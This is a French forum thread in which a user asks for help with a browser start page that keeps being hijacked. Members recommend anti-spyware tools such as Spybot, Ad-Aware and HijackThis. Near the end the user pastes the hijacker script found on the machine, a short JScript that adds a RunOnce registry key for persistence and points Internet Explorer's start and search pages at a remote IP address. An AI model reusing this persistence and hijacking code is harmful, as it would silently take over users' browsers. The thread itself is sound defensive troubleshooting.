Petit soucis avec ma page de démarrage !

Réduire
X

• Heure
  • Afficher
Tout nettoyer
nouveaux messages
  • Cédric
    Assassin

• février 2001
    • 1683

Petit soucis avec ma page de démarrage !

C'est en faisant une recherche sur le net pour jouir d'un programme sans que cela ne me coute monnaie, que mon problème a commencer !

En effet, je me retrouve avec une page de démarrage tantot pour un club de rencontre américain, tantot pour un moteur de recherche ultra naze :-\

Ni une ni deux je vais dans Options pour modifier ladite page de démarrage, tant que je ne redémarre pas la machine, pas de soucis... Par cotnre en redémarrant cette maudite page reviens ! :-(

Quelqu'un a t'il une solution ?
  • arnold_le_joufflu
    Compte archivé

• juin 2001
    • 2407

A mon avis tu t'es fait installer en loucedé un pitit logiciel de merde (n'ayons pas peur des mots)... Du genre Gator, ou truc du genre... Bref, à 99% un spyware... Tu connais le remède je pense
    [b][size=1]Le temps ne fait rien à l'affaire
    Quand on est con, on est con
    Qu'on ait 20 ans, qu'on soit grand-père
    Quand on est con, on est con

Georges Brassens[/size][/b]

Commentaire

• Fredo_L

• avril 2001
      • 6802

On a déjà parlé de ce problème récemment.
      En fait, c'est dans les trucs qui se lancent au démarrage de ton ordi que ta page de démarrage est modifiée.

Quelqu'un avait proposé à ce moment un petit logiciel qui te nettoie justement les choses qui se lancent au démarrage de Windows. En faisant une recherche sur le forum, tu devrais pouvoir le trouver. C'était dans le bar des amis.

Commentaire

• gameslover
        Ojii-sama

• septembre 2001
        • 21344

A mon avis tu devrais utiliser deux logiciels qui font merveilles pour ce genre de problèmes :

- Spybot
        - Ad-aware

Les deux étant gratuits et t'otant absolument toutes les saletés qui pourrissent ton ordi tout en gardant l'essentiel et en te proposant une option de backup au cas où après effacement de trucs trouvés par eux, certains de tes logiciels ne fonctionneraient plus...

Commentaire

• Wokie
          Le bonheur, c'est par là!

• avril 2001
          • 13177

et je donne le lien pour ad-aware de lavasoft

http://www.pcworld.com/downloads/fil...id,7423,00.asp

attention pour les utilisateurs de kazaa, ce logiciel necessitant l'utilisation de spyware (ridicule), il faudra le réinstaller après le nettoyage en rêgle ..
          "Il faut toujours viser la lune, car même en cas d'échec, on atterrit dans les étoiles." - Oscar Wilde.

Commentaire

• Fredo_L

• avril 2001
            • 6802

Provient du message de Wokie
            attention pour les utilisateurs de kazaa, ce logiciel necessitant l'utilisation de spyware (ridicule), il faudra le réinstaller après le nettoyage en rêgle ..
            Une solution consiste à utiliser Kazaa Lite ^^
            En plus, il y a même des options supplémentaires par rapport au Kazaa normal.

Commentaire

• Lord Seb
              DJ Hero

• avril 2001
              • 4799

J'ai eu le même problème récemment (page de démarrage qui s'ouvre constamment sur un moteur de recherche genre "search.net").
              Ad-Aware et Spybot sont inefficaces dans ce cas-là.
              Télécharge plutôt HijackThis. Une fois ouvert, lance un scan.
              Tu y verras plusieurs entrées de clés, les seules qui doivent être effacées sont "sys.reg", "msidaf.dll" et toutes celles qui comportent "t.rack.cc" ou un truc du genre.

Ceci fait, redémarre aussitôt et tu seras tranquille !
              ABANDONWARE.FM : Le bonheur des gamers !
              LA KAVASEB : Le blog d'un gamer auteur ^^

Lord Seb, le 03/06/09 : "volcan, c'est l'anagrame de nougat si tu changes le v par le v par le g et le v par le n."

Commentaire

• Cédric
                Assassin

• février 2001
                • 1683

J'ai utilisé Spybot mais sans Succès...

HiJackThis semble plus adapté ! Au risque de faire une boulette, voila le résultat du scan. L'adresse qui est en page de démarrage est celle qui figure tout en haut. Moi je tente sans succès de remettre www.wanadoo.fr.
                Fichiers attachés

Commentaire

• Fredo_L

• avril 2001
                  • 6802

Provient du message de Fredo_L
                  On a déjà parlé de ce problème récemment.
                  En fait, c'est dans les trucs qui se lancent au démarrage de ton ordi que ta page de démarrage est modifiée.

Quelqu'un avait proposé à ce moment un petit logiciel qui te nettoie justement les choses qui se lancent au démarrage de Windows. En faisant une recherche sur le forum, tu devrais pouvoir le trouver. C'était dans le bar des amis.
                  Cette personne qui proposait une solution était Cold Hand.
                  Voici son message : http://www.abandonware-forums.org/sh...989#post241989

Commentaire

• Invité

j'ai vu le même genre de problème sur un autre forum
                    ça ressemble à un spyware, mais ça part pas avec les softs, ni en modifiant le registre
                    parait que c'est une sorte de trojan

http://www.merijn.org/files/cwshredder.zip

si c'est bien ça, ça doit le virer

Commentaire

• Cold Hand
                      Chaos Theocrate

• avril 2001
                      • 3413

Effectivement Fredo, le problème vient sans doute d'un fichier Javascript qui se lance au démarrage...
                      Avant de poser une question, LISEZ LA FAQ de Lost Treasures FR disponible au http://www.abandonware-france.org/ltf_comm/ltf_faq.php ! Sinon...

Commentaire

• Groovykid
                        Banned

• août 2001
                        • 11165

a mort les programmeurs de spywares !

Commentaire

• Cédric
                          Assassin

• février 2001
                          • 1683

J'ai résolu le problème grace à HiJackThis !

Effectivement un javascript se lancait au démarrage, je ne sais pas comment....

Pour les intéréssés le ficheir se nommait update12.js et se trouvait dans le répertoire C:\Windows\

et voici son contenu:

Code:
                          var url = "http://81.211.105.9/index.php?v=2";
                          var burl = "http://81.211.105.9/search.php?v=2";
                          var fso = new ActiveXObject("Scripting.FileSystemObject");
                          var tfolder = fso.GetSpecialFolder(0);
                          var filepath = tfolder + "\\update12.js";
                          var Shell = new ActiveXObject("WScript.Shell");
                          Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
                          Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
                          Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
                          Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
                          Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
                          Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");
                          Merci à tous pour votre aide !

Commentaire

• Lord Seb
                            DJ Hero

• avril 2001
                            • 4799

Ben content que ça aie marché
                            ABANDONWARE.FM : Le bonheur des gamers !
                            LA KAVASEB : Le blog d'un gamer auteur ^^

Lord Seb, le 03/06/09 : "volcan, c'est l'anagrame de nougat si tu changes le v par le v par le g et le v par le n."

Commentaire

Chargement...